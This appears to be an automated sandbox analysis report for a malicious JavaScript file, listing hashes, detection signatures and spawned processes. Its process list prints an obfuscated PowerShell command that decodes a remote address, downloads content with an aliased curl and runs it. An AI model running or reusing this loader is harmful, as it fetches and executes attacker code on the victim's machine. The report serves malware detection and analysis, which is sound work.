Analysis
- max time kernel: 122s
- max time network: 125s
- platform: windows7_x64
- resource: win7-20240704-en
- resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
- submitted: 22/08/2024, 01:41
Static task: static1
Behavioral task: behavioral1
- Sample: _rnnsnn.js
- Resource: win7-20240704-en
- 2 signatures
- 150 seconds
Behavioral task: behavioral2
- Sample: _rnnsnn.js
- Resource: win10v2004-20240802-en
- 6 signatures
- 150 seconds
General
- Target: _rnnsnn.js
- Size: 118KB
- MD5: 5068d584bdd33473911ffac1e3d66a38
- SHA1: f66ff36a55ca2d51fe5ca1d88404542833873803
- SHA256: c58c00c228cca6f542d90ae389bab8f0455917fd5e4bc396991d40d22cbb8448
- SHA512: 6311473e7c39be2092aa8f0edec141d17613f95493e8e35df209b71b364e024589a77d9a74e2afae5cb10b16639112121257806855d214686196d92725fa862e
- SSDEEP: 3072:L1VTo57Y8J7tcwIgwFyBuLn7zMv1z6WEbTScZhCft/:L3o5Kzg077zQm5fRP0d
Score: 10/10
Malware Config
Signatures
- Process spawned unexpected child process (1 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro.
  description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
  pid: 2500
  pid_target: 1948
  Process: conhost.exe
  procid_target: 30
- Command and Scripting Interpreter: JavaScript (1 TTPs)
Processes
- C:\Windows\system32\wscript.exe
  wscript.exe C:\Users\Admin\AppData\Local\Temp\_rnnsnn.js
  PID:1296
- C:\Windows\system32\conhost.exe
  conhost --headless powershell $nemmbxede='ur';new-alias press c$($nemmbxede)l;$gmmurlxkvz=(6091,6079,6076,6094,6084,6097,6084,6101,6084,6080,6025,6095,6090,6091,6026,6028,6025,6091,6083,6091,6042,6094,6040,6088,6084,6089,6095,6094,6028,6030);$mrujgi=('bronx','get-cmdlet');$izttnhcn=$gmmurlxkvz;foreach($fssifukxy in $izttnhcn){$lrdpln=$fssifukxy;$iwsbbhtrf=$iwsbbhtrf+[char]($lrdpln-5979);$hgndvrz=$iwsbbhtrf;$xrovqwj=$hgndvrz};$gyqmidwxo[2]=$xrovqwj;$uuwoxs='rl';$brrikgly=1;.$([char](9992-9887)+'e'+'x')(press -useb $xrovqwj)
  Signature: Process spawned unexpected child process
  PID:2500